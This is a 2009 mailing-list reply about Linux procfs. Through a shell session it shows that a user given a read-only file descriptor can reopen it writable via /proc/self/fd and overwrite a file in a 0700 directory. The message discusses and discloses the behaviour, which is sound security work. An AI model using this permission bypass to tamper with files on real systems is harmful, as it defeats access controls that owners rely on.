Re: /proc filesystem allows bypassing directory permissions on Linux



0700 mode from the origin, you would be right, and procfs wouldn't allow
opening files in that directory too, but if you let others to traverse
that directory and open your believed to be secure files from the origin,
it's your fault.

I can do the example with fd passing and 700 directory, but it would
be lot of C code. Feel free to play, my example was not nearly the
only way to demonstrate it, and no, it was not racy.

Here is an example that shows the behavior where a passed read-only fd
can become read-write by reopening it through /proc, when file
permissions allow it (but directory permissions do not):

$ sudo su
# mkdir -m 0700 /dir
# echo "safe" > /dir/file.txt
# chmod 0666 /dir/file.txt
# ls -al /dir
total 12
drwx------ 2 root root 4096 2009-10-29 00:28 .
drwxr-xr-x 27 root root 4096 2009-10-29 00:28 ..
-rw-rw-rw- 1 root root 7 2009-10-29 00:43 file.txt
# cat /dir/file.txt
safe

Now user "nobody" cannot read or write this file:

# su nobody -c 'cat /dir/file.txt'
sh: /dir/file.txt: Permission denied
# su nobody -c 'echo "hacked" > /dir/file.txt'
sh: /dir/file.txt: Permission denied
# cat /dir/file.txt
safe

If we provide an open read-only file descriptor (as stdin, fd 0), they
can read it:

# su nobody -c 'cat <&0' < /dir/file.txt
safe

But they still can't write to this descriptor:

# su nobody -c 'echo "hacked" >&0' < /dir/file.txt
sh: line 0: echo: write error: Bad file descriptor

Unless we re-open the file using the magic link in /proc:

# su nobody -c 'echo "hacked" >/proc/self/fd/0' < /dir/file.txt
# cat /dir/file.txt
hacked

Again, debatable whether this is a bug, but it's certainly
non-obvious. There is no other way (that I'm aware) for the "nobody"
user to gain write access to /dir/file.txt, even when given a
read-only fd, without using /proc.

-jim



Relevant Pages

  • Re: From This Momment You Are Bound To EU4 Guidance
    ... Nobody wants to punish the normal peoples but only to close the most ... be safe guided by EU4 till full system change. ... You have allready crushed and are still falling. ... requiring to stop something that is allready on the way ...
    (soc.culture.usa)
  • Re: Persia Sighting!
    ... have a cat that was like this. ... thing is to establish *safe places*. ... He also jumps onto a footlocker I keep against one wall whenever I walk ... Another spot is my bed - if I go into the bedroom he runs in ahead ...
    (rec.pets.cats.anecdotes)
  • Re: McCain getting $58,000 a year in disability
    ... But, the man has friends? ... Wait a second, I left because my cat Cnut died, and I posted ... It was no mystery, and nobody ... she was asking if I needed help to, ...
    (soc.retirement)
  • Re: i want discussion on stuff in this website
    ... qbits killed the cat wrote: ... what are you on about fulco? ... Seems nobody wants to discuss it. ... I am totally fed up with the level of rampant ignorance, hypocrisy and jingoism in Blighted and on these ng's - seems everyone is content to sleepwalk their way to fascism and slavery, all the while bleating about 'turrurists' and such overheated nonsense about the threat of Islam whilst ignoring 'our' own crimes against humanity and the Arab world in particular. ...
    (uk.politics.misc)
  • Re: AATN JMS: Straczynskicast (us eof name
    ... It appears that my keyboard is safe from Buddy - at least for ... "The wireless telegraph is not difficult to understand. ... The ordinary telegraph is like a very long cat. ...
    (rec.arts.sf.tv.babylon5.moderated)